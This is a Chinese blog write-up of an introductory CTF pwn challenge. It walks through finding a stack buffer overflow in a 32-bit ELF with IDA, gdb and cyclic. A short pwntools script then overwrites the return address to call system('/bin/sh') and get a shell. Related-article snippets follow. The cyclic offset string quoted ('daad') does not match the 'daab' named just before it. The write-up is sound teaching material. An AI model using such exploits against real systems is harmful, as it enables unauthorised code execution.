一道简单的入门pwn题

最新推荐文章于 2024-05-14 20:10:52 发布
最新推荐文章于 2024-05-14 20:10:52 发布
阅读量9.6k 收藏 19
点赞数
分类专栏: pwn 文章标签: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m1785717/article/details/82494605
版权

这是一道入门的pwn题

链接:https://pan.baidu.com/s/1vltSv8tJYrqKw8vATxwNYA 密码:f0qy

  1. 拿到题先用file命令查看一下文件信息
    这里写图片描述
    可以看到是32-bit 的elf文件,用32位的IDA打开。

  2. 首先进入main函数,F5反编译后分析代码
    这里写图片描述
    定位到输入的参数&s,可以看到参数s分配的空间。这一题通过覆盖的方式执行_system()函数,参数为/bin/sh,拿到系统权限,所以先用gdb分析一下分配空间以及返回地址。
    3.文件正常执行如下
    这里写图片描述
    根据查询的s的地址大小,用cyclic生成200个字符尝试覆盖,在gdb中运行查看状态
    这里写图片描述
    可以看到程序停止在了‘daab’的地址,即下一个地址为返回地址

cyclic -l daad

之后根据call _system()的地址构造payload,python代码如下

from pwn import *
sh = process('./ret2text')
target = 0x804863a
payload = 'a'*112 + p32(target)
sh.sendline(payload)
sh.interactive()

执行脚本之后拿到系统权限
这里写图片描述

南方还是花房
关注
  • 0
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
做的第一道pwn
LL021101的博客
03-20 1229
步骤 一、使用Ubuntu,对pwn文件进行扫瞄; file语句主要用来看本文件是多少位的,是不是elf文件——ELF文件详解—初步认识_code&poetry的博客-CSDN博客_elf文件,(该链接详细介绍了elf文件的基本结构),图中显示64-bit,意思是64位的文件 checksec命令是用来查看该文件有哪些保护措施。 NX(DEP):数据执行防护 Canary(FS):栈溢出保护 RELRO(ASLR):(地址随机化) PIE(代码地址随机化)...
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
网络安全最全pwn入门-buu第二页解(32道)(持续更新中),网络安全视频开发面试问
最新发布
2401_84264096的博客
05-14 869
还有兄弟不知道网络安全面试可以提前刷吗?费时一周整理的160+网络安全面试,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
pwn 入门基础
y0un9er
08-10 3686
简单介绍入门 pwn 所需要的基础知识,如:汇编、函数调用约定、常用工具等
CTF-记一次PWN练习
蚁景网安学院
03-11 554
PWN是一个黑客语法的俚语词,自"own"这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:“You just got pwned!”)。有一个非常著名的国际赛事叫做Pwn2Own,即通过打败对手来达到拥有的目的。 在CTFPWN型通常会直接给定一个已经编译好的二进制程序(Windows下的EXE或者Linux下的ELF文件等),然后参赛选手通过对二进制程序进行
pwn入门x2
aitangdao4981的博客
05-13 132
pwn1 这由于事先知道源码 从main里调用get_flag函数 然后比较magic与password变量的值,不相等跳出,相等应该就能print出flag 先用objdump看一下main和get_flag 其中getflag里有 这个cmp应该就是比较那两个变量 开gdb调试 打断点b *0x8048720 之后run 然后随便输入一个值 ...
攻防世界hello pwn WP(pwn入门基础
m0_62584974的博客
11-21 2037
攻防世界hello pwn WP(pwn入门基础)的简单讲解
warmup pwn入门
02-11
pwn入门
welpwn pwn 入门
02-11
pwn 入门
pwn1 一道pwn练习
05-07
pwn练习
forgot pwn 入门
02-11
pwn 入门
pwn点云文件
07-06
打开是一个怪兽的点云文件,在需要使用pwn文件时方便使用
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
PWN-入门基础
工作学习笔记
05-27 3787
简单介绍四个方面的内容:一是什么是PWN、二是做PWN所需知识储备、三是基于Ubuntu搭建PWN环境、四是在公网上练习PWN
PWN 文件无法运行,好好回去学linux基础。
weixin_45971758的博客
08-19 486
在Ubuntu系统,有些程序无法运行,没有执行权限,无法运行。 报错: bash: ./22e2d7579d2d4359a5a1735edddef631: Permission denied 1.chmod 777 ./xxxxx 查看权限 : ls -al 给予文件最高权限,chmod 777 ./xxxxxx 2.或者文件右键,把这个勾上 ...
PWN概论
m0_52249553的博客
05-06 6861
什么是pwn pwnctf赛中的一个目类别,它在黑客俚语中代表着攻破,获取权限,由“own”这个词引申而来。在CTF比赛中它代表着溢出类的目,常见的类型有整数溢出、栈溢出、堆溢出等。主要考查参赛选手对漏洞的利用能力。 学习pwn的知识储备 反汇编工具 在比赛中我们会拿到一个二进制文件(由c文件编译而来),我们要找出这个可执行文件的漏洞,但二进制文件是由0和1的机器码组成,正常人是直接无法看懂里面的内容的,这时我们需要利用反编译工具将这个二进制文件反编译为我们能看懂的语言(汇编语言或者c语言
Ctfshow pwn 02(自己做出的第一道pwn
weixin_64875092的博客
12-05 5274
算是一篇第一次做出pwn的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
ctf pwn目的部署
giantbranch的专栏
09-17 7161
目录使用socat部署使用pwn_deploy部署使用pwn_deploy部署 使用socat部署 安装 apt install socat 模板:socat tcp-listen:port,fork exec:./程序名,reuseaddr 实例:socat tcp-listen:10001,fork exec:./pwn1,reuseaddr 使用pwn_deploy部署 https://g...
pwn时的一些调试技巧
zszcr的博客
04-06 4947
当你觉得你的脚本没有问,但是却又怎么也出你想要的结果时,你就需要用到调试了一个是设置context.log_level="debug"脚本在执行时就会输出debug的信息,你可以通过观察这些信息查找哪步出错了而另一个就是 用pwnlib.gdb.attach(p)在发送payload前加入这条语句,同时加上pause() 时脚本暂停然后就会弹出来一个开启着gdb的终端,你先在gdb中设置好断点然...
ctf 简单pwn资源
08-09
CTF 简单 PWN 资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单目。这些目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取目提供的关键信息或获取系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值